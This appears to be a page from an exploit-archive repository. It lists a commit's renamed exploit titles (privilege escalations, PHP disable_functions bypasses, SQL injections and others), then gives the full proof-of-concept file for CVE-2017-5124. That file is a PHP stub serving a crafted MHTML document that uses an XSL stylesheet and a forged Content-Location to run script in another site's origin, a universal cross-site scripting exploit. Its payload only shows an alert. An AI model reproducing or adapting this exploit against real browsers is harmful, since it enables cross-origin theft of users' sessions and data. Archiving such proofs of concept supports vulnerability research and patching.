268e737bb6
21 changes to exploits/shellcodes Notepad3 1.0.2.350 - Denial of Service (PoC) PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass PHP 5.x COM - Safe Mode / Disable Functions Bypass VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Privilege Escalation Libuser - 'roothelper' Privilege Escalation (Metasploit) Libuser - 'roothelper' Local Privilege Escalation (Metasploit) Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit) Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit) Sun Solaris 11.3 AVS - Local Kernel root Exploit Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass Webkit (Safari) - Universal Cross-site Scripting Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting PHP < 5.6.2 - 'Shellshock' 'disable_functions()' Bypass Command Injection PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library PHP Imagick 3.3.0 - disable_functions Bypass Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin) PHP-Proxy 5.1.0 - Local File Inclusion BitZoom 1.0 - 'rollno' SQL Injection Net-Billetterie 2.9 - 'login' SQL Injection Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection EverSync 0.5 - Arbitrary File Download Meneame English Pligg 5.8 - 'search' SQL Injection Kordil EDMS 2.2.60rc3 - Arbitrary File Upload Simple E-Document 1.31 - 'username' SQL Injection 2-Plan Team 1.0.4 - Arbitrary File Upload PHP Mass Mail 1.0 - Arbitrary File Upload Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
36 lines
No EOL
875 B
Text
36 lines
No EOL
875 B
Text
<?php
|
|
$filename=realpath("PoC.mht");
|
|
header( "Content-type: multipart/related");
|
|
readfile($filename);
|
|
?>
|
|
|
|
|
|
|
|
|
|
MIME-Version: 1.0
|
|
Content-Type: multipart/related;
|
|
type="text/html";
|
|
boundary="----MultipartBoundary--"
|
|
CVE-2017-5124
|
|
|
|
------MultipartBoundary--
|
|
Content-Type: application/xml;
|
|
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<?xml-stylesheet type="text/xml" href="#stylesheet"?>
|
|
<!DOCTYPE catalog [
|
|
<!ATTLIST xsl:stylesheet
|
|
id ID #REQUIRED>
|
|
]>
|
|
<xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
|
<xsl:template match="*">
|
|
<html><iframe style="display:none" src="https://google.com"></iframe></html>
|
|
</xsl:template>
|
|
</xsl:stylesheet>
|
|
|
|
------MultipartBoundary--
|
|
Content-Type: text/html
|
|
Content-Location: https://google.com
|
|
|
|
<script>alert('Location origin: '+location.origin)</script>
|
|
------MultipartBoundary---- |